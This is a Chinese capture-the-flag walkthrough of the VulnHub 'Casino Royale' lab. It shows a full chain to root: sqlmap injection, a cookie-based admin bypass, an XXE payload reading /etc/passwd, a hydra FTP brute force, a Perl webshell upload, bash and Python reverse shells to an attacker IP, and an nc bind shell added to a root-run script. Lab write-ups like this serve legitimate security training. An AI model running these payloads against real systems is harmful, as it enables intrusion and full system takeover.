当前位置: 首页 > article >正文

Casino Royale靶场wp

article 2025/1/4 6:24:49

0x00 下载安装

https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova

导入vmware启动

0x01 主机信息收集

0x02目录扫描

index.php 获取到一个域名

修改本地hosts 添加一行

路径:C:\Windows\System32\drivers\etc

192.168.2.20 casino-royale.local

点击view,有点像sql查询,抓包看看

很像注入点,sqlmap嗦一把,

一个延迟注入

获取了三个用户

--os-shell 写不进去 可能是我重启过靶机应该可以写入的

只能用个sqlshell

select @@datadir: '/var/lib/mysql/' 文件写不进去,换个方向

install 一个安装PokerMax Pro Poker League Software页面

查找到一个漏洞 PokerMax Poker League 0.13 - Insecure Cookie Handling - PHP webapps Exploit 添加cookie 获得管理员登录

8081端口,没看出来啥,执行了是一个日志的东西

0x03绕过

1. 通过sql注入绕过

这里看前面大佬有搜到源码,现在搜不到了

/pokeradmin/configure.php 登陆处存在注入,并且未做sql注入防护

sqlmap -u http://casino-royale.local/pokeradmin/ --level=5 --risk=3 --os-shell --batch --forms

通过wget下载一句话木马,wget http://192.168.2.11/1.txt mv 1.txt 1.php 重命名

路径为 http://casino-royale.local/pokeradmin/1.php 可以通过os-shell获取路径

获取到数据库账户密码 valenka 11archives11

2.漏洞绕过

查找历史漏洞

searchsploit PokerMax

searchsploit -m php/webapps/6766.txt

在浏览器f12控制台执行js脚本

javascript:document.cookie = "ValidUserAdmin=admin";

重新访问,成功绕过登录

得到用户名 密码 admin raise12million

只有Valenka里面有东西

得到一个路径

需要使用域名,把路径加到后面 http://casino-royale.local/vip-client-portfolios/?uri=blog

有登录 注册 重置

密码不知道,重置密码,发送到了管理员账户,

找一下漏洞。

有一个csrf

Snowfox CMS 查找cms漏洞。有一个csrf

Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin) - PHP webapps Exploit

EHLO test5
MAIL FROM:obanno@bond.com
RCPT TO:valenka
DATA
Subject:obanno
http://192.168.2.11/index.html
obanno
kthxbai

.

发了n个邮件,一个也没成功 跳过了 登录获取到路径

view-source:http://casino-royale.local//ultra-access-view/main.php

查看源代码 是一个xxe 可以读取文件

写入修改为post 用户名为

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY file SYSTEM "file:///etc/passwd" >]> <creds> <customer>&file;</customer> <password>mypass</password> </creds>

ftpUserULTRA 提到密码很简单,来一波爆破

hydra -l ftpUserULTRA -P ignis-1K.txt ftp://192.168.2.21

得到密码为 ftpUserULTRA bankbank

三个文件

perl文件 刚好是该目录下 http://casino-royale.local/ultra-access-view/hello_world.pl 文件可以被执行,权限可读可执行,,想办法写入反弹shell

直接找了个大马,上传,webshell/pl/pps-pl/pps-v4.0.pl at master · tennc/webshell · GitHub

执行反弹shell

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' ;

0x04 获取le权限

查找可提权文件,

find / -type f -user root -perm -o=w 2>/dev/null | grep -v 'proc\|sys'

开启监听

反弹shell提权 没啥用,没得到权限

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' \;

查找可提权文件

find / -user root -perm -4000 -print 2>/dev/null

发现一个路径/opt/casino-royale/mi6_detect_test 这几个文件的权限很特别

这正好是8081端口运行的服务,点击跳转到http://casino-royale.local:8081/collect.php

查看源码,该文件会执行目录下的py文件,不可修改

点击按钮,会跳转运行collect.php ,执行 casino-data-collection.py 我们直接写入python反弹shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.11",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

启动监听,获取shell,得到le权限,接下来要获取root

0x05 获取root权限

mi6_detect_test为root所有,会执行run.sh文件,我们通过echo命令开一个正向连接,写入run.sh在运行mi6既可获取到root权限 echo "nc -lvvp 1234 -t -e /bin/bash" >> run.sh

成功拿下


http://www.kler.cn/a/459726.html

相关文章:

  • js的一些处理
  • C#二维数组详解
  • 【C++】B2089 数组逆序重存放
  • Java的基础概念(二)
  • 基于C语言的卡丁车管理系统【控制台应用程序】
  • 珞珈一号夜光遥感数据地理配准,栅格数据地理配准
  • C语言初阶习题【19】三子棋游戏
  • Maven:Java项目构建与管理的利器
  • 云端-IPv4 VRRP 单备份组配置实验
  • TinaCMS: 革命性的开源内容管理框架
  • 2024 开放原子开发者大会活动回顾|瀚高 IvorySQL 开源数据库在国产软件的开源实践
  • Github 2024-12-27 Java开源项目日报Top10
  • 微信小程序 单选多选radio/checkbox 纯代码分享
  • 【前端,TypeScript】TypeScript速成(五):对象类型
  • MATLAB中使用rationalfit函数进行有理函数拟合的步骤
  • 网络入侵检测系统(IDS)的安装部署
  • 使用uWSGI将Flask应用部署到生产环境
  • 指针与数组:深入C语言的内存操作艺术
  • UniApp 页面布局基础
  • Java 8 及经典面试题全解析
  • 深入探索:使用Java爬虫获取亚马逊商品图片
  • 数据库高安全—openGauss安全整体架构安全认证
  • 自动化文档处理:Azure AI Document Intelligence
  • 保姆级教程Docker部署ClickHouse镜像
  • 阿里云大模型ACP高级工程师认证模拟试题
  • Mysq学习-Mysql查询(4)